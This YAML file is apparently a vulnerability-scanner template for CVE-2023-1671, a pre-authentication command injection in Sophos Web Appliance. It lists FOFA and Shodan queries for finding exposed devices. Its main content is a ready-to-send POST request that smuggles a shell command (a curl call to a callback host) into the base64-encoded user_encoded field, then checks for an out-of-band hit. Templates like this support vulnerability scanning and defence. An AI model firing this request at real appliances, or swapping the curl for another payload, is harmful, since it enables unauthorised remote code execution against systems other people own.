id: CVE-2023-1671

info:
  name: Sophos Web Appliance - Remote Code Execution
  author: Co5mos
  severity: critical
  verified: false
  description: |
    A pre-auth command injection vulnerability in the warn-proceed handler of Sophos Web Appliance older than version 4.3.10.4 allows execution of arbitrary code.
    FOFA: title="Sophos Web Appliance"
    SHODAN: title:"Sophos Web Appliance"
  reference:
    - https://vulncheck.com/blog/cve-2023-1671-analysis
    - https://nvd.nist.gov/vuln/detail/CVE-2023-1671
  tags: cve,cve2023,rce,sophos,oast
  created: 2023/06/17

set:
  reverse: newReverse()
  reverseURL: reverse.url.host
rules:
  r0:
    request:
      method: POST
      path: /index.php?c=blocked&action=continue
      headers:
        User-Agent: curl/7.86.0
      body: |
        args_reason=filetypewarn&url={{randstr}}&filetype={{randstr}}&user={{randstr}}&user_encoded={{base64("\';curl {{reverseURL}} #")}}
    expression: reverse.wait(5)
expression: r0()